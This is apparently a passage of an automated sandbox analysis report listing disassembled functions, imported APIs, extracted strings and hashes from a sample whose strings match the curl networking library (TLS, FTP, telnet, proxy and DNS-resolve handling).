                                    • Instruction Fuzzy Hash: A1710E31A08B129FC728DF29EA48765BBE1FF44318F28551AD415A3A91D775FC84CB81
                                    Function 00E02230 Relevance: 24.7, APIs: 13, Strings: 1, Instructions: 155fileCOMMON
                                    Download Yara Rule
                                    APIs
                                    • _fileno.API-MS-WIN-CRT-STDIO-L1-1-0(00000000), ref: 00E022E2
                                    • _get_osfhandle.API-MS-WIN-CRT-STDIO-L1-1-0(00000000), ref: 00E022E9
                                    • _fileno.API-MS-WIN-CRT-STDIO-L1-1-0(?), ref: 00E022F6
                                    • _isatty.API-MS-WIN-CRT-STDIO-L1-1-0(00000000), ref: 00E022FD
                                    • GetConsoleScreenBufferInfo.API-MS-WIN-CORE-CONSOLE-L2-1-0(?,?), ref: 00E02312
                                    • MultiByteToWideChar.API-MS-WIN-CORE-STRING-L1-1-0(0000FDE9,00000000,?,?,00000000,00000000), ref: 00E0232A
                                    • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000000), ref: 00E02336
                                    • MultiByteToWideChar.API-MS-WIN-CORE-STRING-L1-1-0(0000FDE9,00000000,?,?,00000000,?), ref: 00E02354
                                    • WriteConsoleW.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,00000000,00000000,?,00000000), ref: 00E0236C
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000), ref: 00E02377
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000), ref: 00E02387
                                    • fwrite.API-MS-WIN-CRT-STDIO-L1-1-0(?,?,?,?), ref: 00E0239E
                                    • fflush.API-MS-WIN-CRT-STDIO-L1-1-0(?), ref: 00E023DC
                                    Strings
                                    • Binary output can mess up your terminal. Use "--output -" to tell curl to output it to your terminal anyway, or consider "--output <FILE>" to save to a file., xrefs: 00E022BB
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.1638835568.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                    • Associated: 00000003.00000002.1638798426.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639577660.0000000000E55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639626412.0000000000E6F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639655045.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_e00000_TNheBOJElq.jbxd
                                    Similarity
                                    • API ID: ByteCharConsoleMultiWide_filenofree$BufferInfoScreenWrite_get_osfhandle_isattyfflushfwritemalloc
                                    • String ID: Binary output can mess up your terminal. Use "--output -" to tell curl to output it to your terminal anyway, or consider "--output <FILE>" to save to a file.
                                    • API String ID: 4159644049-3734715646
                                    • Opcode ID: 40066ee59959ba48cab4052b126d053f2e03b7ff544c8ab33405afb9a43e24aa
                                    • Instruction ID: 0dab76ccf8617f72c2145ea9ce5dde47ffb09684f31ad81ce584cff7b956bb28
                                    • Opcode Fuzzy Hash: 40066ee59959ba48cab4052b126d053f2e03b7ff544c8ab33405afb9a43e24aa
                                    • Instruction Fuzzy Hash: A9517971A00706AFDB149FA5DD48BEEBBF9AF08319F04541DFA05B61A1DB74AC84CB20
                                    Function 00E4FE08 Relevance: 24.3, APIs: 13, Strings: 3, Instructions: 306COMMON
                                    Download Yara Rule
                                    Strings
                                    • GSSAPI handshake failure (empty security message), xrefs: 00E50193
                                    • GSSAPI handshake failure (invalid security layer), xrefs: 00E4FF18
                                    • GSSAPI handshake failure (invalid security data), xrefs: 00E4FED3
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.1638835568.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                    • Associated: 00000003.00000002.1638798426.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639577660.0000000000E55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639626412.0000000000E6F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639655045.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_e00000_TNheBOJElq.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: GSSAPI handshake failure (empty security message)$GSSAPI handshake failure (invalid security data)$GSSAPI handshake failure (invalid security layer)
                                    • API String ID: 0-3320144510
                                    • Opcode ID: a235083f05f9d789346824221b60e1fc9bfbcc97095e0c19beac3565f0d1e502
                                    • Instruction ID: d588f1690b0c3d800b47c85bfa4475e4ac5c5910051607bf38046c9413da1a62
                                    • Opcode Fuzzy Hash: a235083f05f9d789346824221b60e1fc9bfbcc97095e0c19beac3565f0d1e502
                                    • Instruction Fuzzy Hash: E2C14771A04219DFCF14DFA9EC54AADBBF5EF08351F24842AE805B7261DB74AD09CB90
                                    Function 00E44B3E Relevance: 23.1, APIs: 5, Strings: 8, Instructions: 395COMMON
                                    Download Yara Rule
                                    APIs
                                    • malloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00E44BCA
                                    • malloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00E44BFE
                                    • realloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00E44C39
                                    • malloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00E44CD0
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,00000000,00000000,?,00000000,00000000,?,?,?), ref: 00E44DDA
                                      • Part of subcall function 00E1DB77: recv.WS2_32(?,?,?,00000000), ref: 00E1DB81
                                      • Part of subcall function 00E1DB77: WSAGetLastError.WS2_32(?,?,?,00000000), ref: 00E1DB8E
                                    Strings
                                    • schannel: %s, xrefs: 00E44FC7
                                    • schannel: next InitializeSecurityContext failed: %s, xrefs: 00E44FA8, 00E44FF8
                                    • SSL: public key does not match pinned public key, xrefs: 00E450BE
                                    • schannel: failed to send next handshake data: sent %zd of %lu bytes, xrefs: 00E4501F
                                    • schannel: failed to receive handshake, SSL/TLS connection failed, xrefs: 00E44F1B
                                    • schannel: SNI or certificate check failed: %s, xrefs: 00E44FE9
                                    • schannel: unable to re-allocate memory, xrefs: 00E44C41
                                    • schannel: unable to allocate memory, xrefs: 00E45122
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.1638835568.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                    • Associated: 00000003.00000002.1638798426.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639577660.0000000000E55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639626412.0000000000E6F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639655045.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_e00000_TNheBOJElq.jbxd
                                    Similarity
                                    • API ID: malloc$ErrorLastfreereallocrecv
                                    • String ID: SSL: public key does not match pinned public key$schannel: %s$schannel: SNI or certificate check failed: %s$schannel: failed to receive handshake, SSL/TLS connection failed$schannel: failed to send next handshake data: sent %zd of %lu bytes$schannel: next InitializeSecurityContext failed: %s$schannel: unable to allocate memory$schannel: unable to re-allocate memory
                                    • API String ID: 3337821324-3713536417
                                    • Opcode ID: d3f924a0f9a660375adf28e43da5f6be58b98d320b93b3fef516d4dcbcabf5a1
                                    • Instruction ID: feed681630cff2723926ffeb3d5315dc69e0becf0bd4c12b23559b6825dfcd5a
                                    • Opcode Fuzzy Hash: d3f924a0f9a660375adf28e43da5f6be58b98d320b93b3fef516d4dcbcabf5a1
                                    • Instruction Fuzzy Hash: F6F15AB1A006148FDB28CF25EC85BE9B7B5AF48314F1451EAD809BB291DB709E84CF80
                                    Function 00E2FD8C Relevance: 23.1, APIs: 10, Strings: 3, Instructions: 343COMMON
                                    Download Yara Rule
                                    APIs
                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00E2FDDF
                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00E2FE73
                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00E2FE95
                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00E2FEA8
                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00E2FF51
                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00E2FF76
                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00E2FF89
                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00E300F0
                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00E300FD
                                    • fflush.API-MS-WIN-CRT-STDIO-L1-1-0(?), ref: 00E301FB
                                    Strings
                                    • %% Total %% Received %% Xferd Average Speed Time Time Time Current Dload Upload Total Spent Left Speed, xrefs: 00E2FE1B
                                    • ** Resuming transfer from byte position %I64d, xrefs: 00E2FE08
                                    • %3I64d %s %3I64d %s %3I64d %s %s %s %s %s %s %s, xrefs: 00E301E2
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.1638835568.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                    • Associated: 00000003.00000002.1638798426.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639577660.0000000000E55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639626412.0000000000E6F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639655045.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_e00000_TNheBOJElq.jbxd
                                    Similarity
                                    • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@$fflush
                                    • String ID: %3I64d %s %3I64d %s %3I64d %s %s %s %s %s %s %s$ %% Total %% Received %% Xferd Average Speed Time Time Time Current Dload Upload Total Spent Left Speed$** Resuming transfer from byte position %I64d
                                    • API String ID: 1893817590-664487449
                                    • Opcode ID: 567c7858514f9567e6957d90866e78b483e64978fb8b63ca6f865e64224808e0
                                    • Instruction ID: bc29bbf92d2a70b8770845854203543714511ea48eeba0bf65fab6b1cc814296
                                    • Opcode Fuzzy Hash: 567c7858514f9567e6957d90866e78b483e64978fb8b63ca6f865e64224808e0
                                    • Instruction Fuzzy Hash: CCD15571E04B18AEEB258B64CD81BAABBBAEF48304F10556DE95EB3251DB353D40CF10
                                    Function 00E2ED3C Relevance: 23.1, APIs: 3, Strings: 10, Instructions: 308COMMON
                                    Download Yara Rule
                                    APIs
                                    • ___from_strstr_to_strchr.LIBCMT ref: 00E2EEE5
                                    Strings
                                    • +, xrefs: 00E2F055
                                    • *, xrefs: 00E2F08B
                                    • RESOLVE %s:%d is wildcard, enabling wildcard checks, xrefs: 00E2F0AA
                                    • Added %s:%d:%s to DNS cache%s, xrefs: 00E2F07D
                                    • RESOLVE %s:%d is - old addresses discarded, xrefs: 00E2EFEE
                                    • Couldn't parse CURLOPT_RESOLVE entry '%s', xrefs: 00E2F121
                                    • Couldn't parse CURLOPT_RESOLVE removal entry '%s', xrefs: 00E2EDAD
                                    • Resolve address '%s' found illegal, xrefs: 00E2F105
                                    • (non-permanent), xrefs: 00E2F05C
                                    • %255[^:]:%d, xrefs: 00E2ED98
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.1638835568.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                    • Associated: 00000003.00000002.1638798426.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639577660.0000000000E55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639626412.0000000000E6F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639655045.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_e00000_TNheBOJElq.jbxd
                                    Similarity
                                    • API ID: ___from_strstr_to_strchr
                                    • String ID: (non-permanent)$%255[^:]:%d$*$+$Added %s:%d:%s to DNS cache%s$Couldn't parse CURLOPT_RESOLVE entry '%s'$Couldn't parse CURLOPT_RESOLVE removal entry '%s'$RESOLVE %s:%d is - old addresses discarded$RESOLVE %s:%d is wildcard, enabling wildcard checks$Resolve address '%s' found illegal
                                    • API String ID: 601868998-1491845622
                                    • Opcode ID: c6ad37e577fb1731fc71f00ad66880cab47d30bd3d5cdda5f044716b9810fe12
                                    • Instruction ID: d676ba72cc4c7499151b4dc01d41a01d13cf5d0d3fa4ea86fb153d6b7769434d
                                    • Opcode Fuzzy Hash: c6ad37e577fb1731fc71f00ad66880cab47d30bd3d5cdda5f044716b9810fe12
                                    • Instruction Fuzzy Hash: 56B10631A046299FDF359B24EC85BEEB7B9AF85308F1410B9E04976282DB715E85CF50
                                    Function 00E15F16 Relevance: 23.0, APIs: 4, Strings: 11, Instructions: 480COMMON
                                    Download Yara Rule
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.1638835568.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                    • Associated: 00000003.00000002.1638798426.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639577660.0000000000E55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639626412.0000000000E6F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639655045.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_e00000_TNheBOJElq.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: %%25%s]$%25$%s://%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s$0)$0)$P)$T)$X)$file$file://%s%s%s$https
                                    • API String ID: 0-525504209
                                    • Opcode ID: 852bce58a4ecdaefd8e4393d78bf1644500ee20da084c838d2635f96834022b4
                                    • Instruction ID: 87ef4ac430e88959afc6a43dc319e5cf016c2deebbedbd38db090d8953191047
                                    • Opcode Fuzzy Hash: 852bce58a4ecdaefd8e4393d78bf1644500ee20da084c838d2635f96834022b4
                                    • Instruction Fuzzy Hash: 9702CE31E00616EFDB258F68D8407EEBBF1AF88754F14A069E925BB291D7709C84CB90
                                    Function 00E297D8 Relevance: 23.0, APIs: 9, Strings: 4, Instructions: 205stringCOMMON
                                    Download Yara Rule
                                    APIs
                                    • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00E15A87), ref: 00E29806
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,00E15A87), ref: 00E2983D
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,00E15A87), ref: 00E2985F
                                    • ___from_strstr_to_strchr.LIBCMT ref: 00E2986B
                                    • strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00E65674,00000000,00000002,?,00E15A87), ref: 00E29884
                                    • strncmp.API-MS-WIN-CRT-STRING-L1-1-0(../,00000000,00000003), ref: 00E29899
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00E299D1
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.1638835568.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                    • Associated: 00000003.00000002.1638798426.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639577660.0000000000E55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639626412.0000000000E6F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639655045.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_e00000_TNheBOJElq.jbxd
                                    Similarity
                                    • API ID: free$strncmp$___from_strstr_to_strchrmalloc
                                    • String ID: ../$/..$/../$/./
                                    • API String ID: 11556461-456519384
                                    • Opcode ID: 30f0c090a2fb7fd80bc372e60042ea6ee881177022ba3a529d91d3826c593445
                                    • Instruction ID: 7b96d0aaf7663ebaf3f999aea1c32971b5dff5c160a4036067c417192463d01d
                                    • Opcode Fuzzy Hash: 30f0c090a2fb7fd80bc372e60042ea6ee881177022ba3a529d91d3826c593445
                                    • Instruction Fuzzy Hash: EA517C22B082629FDB251B29BC10779FFA59FD6374F28306ED4C6B7257D6A04C85C750
                                    Function 00E3D200 Relevance: 22.9, APIs: 5, Strings: 10, Instructions: 410COMMON
                                    Download Yara Rule
                                    APIs
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00E3D359
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00E3D36E
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00E3D3C0
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00E3D405
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00E3D58F
                                    Strings
                                    • Uploaded unaligned file size (%I64d out of %I64d bytes), xrefs: 00E3D696
                                    • No data was received, xrefs: 00E3D709
                                    • server did not report OK, got %d, xrefs: 00E3D5FB
                                    • Remembering we are in dir "%s", xrefs: 00E3D3D0
                                    • ABOR, xrefs: 00E3D445
                                    • Received only partial file: %I64d bytes, xrefs: 00E3D71F
                                    • Failure sending ABOR command: %s, xrefs: 00E3D469
                                    • control connection looks dead, xrefs: 00E3D553
                                    • Exceeded storage allocation, xrefs: 00E3D60E
                                    • partial download completed, closing connection, xrefs: 00E3D5BA
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.1638835568.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                    • Associated: 00000003.00000002.1638798426.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639577660.0000000000E55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639626412.0000000000E6F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639655045.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_e00000_TNheBOJElq.jbxd
                                    Similarity
                                    • API ID: free
                                    • String ID: ABOR$Exceeded storage allocation$Failure sending ABOR command: %s$No data was received$Received only partial file: %I64d bytes$Remembering we are in dir "%s"$Uploaded unaligned file size (%I64d out of %I64d bytes)$control connection looks dead$partial download completed, closing connection$server did not report OK, got %d
                                    • API String ID: 1294909896-265991785
                                    • Opcode ID: e4f9e6a4a348db06e8e58f1d1d9399a11b55cbce4c63271253cfdd0d64aec998
                                    • Instruction ID: c0f26fb2a4e26ca8ecc9c0b38cfdc686346154284b07e11090742165ab9049bc
                                    • Opcode Fuzzy Hash: e4f9e6a4a348db06e8e58f1d1d9399a11b55cbce4c63271253cfdd0d64aec998
                                    • Instruction Fuzzy Hash: 08F1157050C341DFDB29CE34EC8C7AABFE1BB41318F14661DE8A966192C775AC58CB92
                                    Function 00E1A0B8 Relevance: 22.8, APIs: 11, Strings: 2, Instructions: 89stringCOMMON
                                    Download Yara Rule
                                    APIs
                                    • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00E1A0C3
                                    • _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00E1A0CB
                                    • __sys_nerr.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00E1A0DD
                                    • __sys_errlist.API-MS-WIN-CRT-RUNTIME-L1-1-0(000000FF), ref: 00E1A0EC
                                    • strncpy.API-MS-WIN-CRT-STRING-L1-1-0(?,00000000), ref: 00E1A0F6
                                    • _strrchr.LIBCMT ref: 00E1A142
                                    • _strrchr.LIBCMT ref: 00E1A15C
                                    • _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00E1A173
                                    • _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00E1A180
                                    • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00E1A188
                                    • SetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00000000), ref: 00E1A193
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.1638835568.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                    • Associated: 00000003.00000002.1638798426.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639577660.0000000000E55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639626412.0000000000E6F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639655045.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_e00000_TNheBOJElq.jbxd
                                    Similarity
                                    • API ID: ErrorLast_errno$_strrchr$__sys_errlist__sys_nerrstrncpy
                                    • String ID: 0kv@qv@/lv$Unknown error %d (%#x)
                                    • API String ID: 3225659327-2262358793
                                    • Opcode ID: b46ee75f259f313228b7e9e9b08173d0c390b3f8364aae6bf3d4c5129e86567f
                                    • Instruction ID: 5a505bbbf0aa35ed8252108afda61e5fd42e717c2a0d0eae348aa257af10ee29
                                    • Opcode Fuzzy Hash: b46ee75f259f313228b7e9e9b08173d0c390b3f8364aae6bf3d4c5129e86567f
                                    • Instruction Fuzzy Hash: AE213871302B01AFC71927799C197BDBBD99F56352F181479F402F72A1EAA088408662
                                    Function 00E240DC Relevance: 22.8, APIs: 10, Strings: 5, Instructions: 272COMMON
                                    Download Yara Rule
                                    APIs
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00E241E7
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00E241FD
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00E2422D
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00E24265
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00E24291
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00E242D5
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00E24311
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00E243B3
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00E24420
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00E24432
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.1638835568.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                    • Associated: 00000003.00000002.1638798426.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639577660.0000000000E55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639626412.0000000000E6F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639655045.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_e00000_TNheBOJElq.jbxd
                                    Similarity
                                    • API ID: free
                                    • String ID: NO_PROXY$Uses proxy env variable %s == '%s'$Xf$memory shortage$no_proxy
                                    • API String ID: 1294909896-3033572779
                                    • Opcode ID: 2b5c5137c1f58e7a37c36c073b7a2b77d5d8963004cd59942b4668a831bf9aaf
                                    • Instruction ID: ac1680139714d0825115988de8c91162ef0f2ca474062a981725f042c1e65b72
                                    • Opcode Fuzzy Hash: 2b5c5137c1f58e7a37c36c073b7a2b77d5d8963004cd59942b4668a831bf9aaf
                                    • Instruction Fuzzy Hash: E8A1CDB1B04626EFDF08DF75A8447AEBBE5BF04319F245129D419B32A1DBB46D04CB80
                                    Function 00E3EE2C Relevance: 22.7, APIs: 5, Strings: 10, Instructions: 188stringCOMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 00E10DCE: free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00E10E08
                                    • strncpy.API-MS-WIN-CRT-STRING-L1-1-0(?,?,0000001F), ref: 00E3EF55
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00E3F0E0
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00E3F0F5
                                      • Part of subcall function 00E10E10: free.API-MS-WIN-CRT-HEAP-L1-1-0(?,00E03167), ref: 00E10E2C
                                      • Part of subcall function 00E10E10: free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00E10E41
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.1638835568.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                    • Associated: 00000003.00000002.1638798426.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639577660.0000000000E55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639626412.0000000000E6F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639655045.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_e00000_TNheBOJElq.jbxd
                                    Similarity
                                    • API ID: free$strncpy
                                    • String ID: %127[^= ]%*[ =]%255s$%hu%*[xX]%hu$1$BINARY$NEW_ENV$Syntax error in telnet option: %s$TTYPE$USER,%s$Unknown telnet option %s$XDISPLOC
                                    • API String ID: 526250031-1116758244
                                    • Opcode ID: 0208020b307a657389d4ec57bef9b29981326a4264edaa1f2ebf52bd00eb7f2b
                                    • Instruction ID: 7ea8155f44f83e3e1c8539853a6206af8b2ede91a1528712e2d8d2b0df8160fe
                                    • Opcode Fuzzy Hash: 0208020b307a657389d4ec57bef9b29981326a4264edaa1f2ebf52bd00eb7f2b
                                    • Instruction Fuzzy Hash: 8071C031904208ABDF14DF14DC95BE67BB9BF04344F1490B5E948BB286DFB19A88CF61
                                    Function 00E3C900 Relevance: 21.4, APIs: 5, Strings: 9, Instructions: 363COMMON
                                    Download Yara Rule
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.1638835568.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                    • Associated: 00000003.00000002.1638798426.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639577660.0000000000E55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639626412.0000000000E6F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639655045.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_e00000_TNheBOJElq.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: ACCT rejected by server: %03d$AUTH %s$CCC$Entry path is '%s'$Failed to clear the command channel (CCC)$Got a %03d ftp-server response when 220 was expected$PROT %c$SYST$unsupported parameter to CURLOPT_FTPSSLAUTH: %d
                                    • API String ID: 0-499900516
                                    • Opcode ID: 7f74905f46d4cdefd1472daa757fa3d947669626d039c1e16d1ea6ba5d072304
                                    • Instruction ID: 739fd672051935af4eee0be0e4c8c4fb29f5d5d10a17c257c23a98cb915268a0
                                    • Opcode Fuzzy Hash: 7f74905f46d4cdefd1472daa757fa3d947669626d039c1e16d1ea6ba5d072304
                                    • Instruction Fuzzy Hash: 74C13771A042049FDB14DF28D889BBA7BE4AF44304F28617AED4AFB242DB74DC45CB91
                                    Function 00E01580 Relevance: 21.3, APIs: 8, Strings: 4, Instructions: 274fileCOMMON
                                    Download Yara Rule
                                    APIs
                                    • fwrite.API-MS-WIN-CRT-STDIO-L1-1-0(?,?,?,?), ref: 00E015E1
                                    • fflush.API-MS-WIN-CRT-STDIO-L1-1-0(?), ref: 00E015F9
                                    • fwrite.API-MS-WIN-CRT-STDIO-L1-1-0(?,?,?,?), ref: 00E01692
                                    • fputc.API-MS-WIN-CRT-STDIO-L1-1-0(0000000A,?,?,?), ref: 00E016A0
                                    • fflush.API-MS-WIN-CRT-STDIO-L1-1-0(?,?,?), ref: 00E016AC
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000), ref: 00E01780
                                    • fwrite.API-MS-WIN-CRT-STDIO-L1-1-0(00000001,?,00000001,?,?,%.*s:,00000000,?), ref: 00E018A3
                                    • fwrite.API-MS-WIN-CRT-STDIO-L1-1-0(?,?,00000001,?), ref: 00E018B7
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.1638835568.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
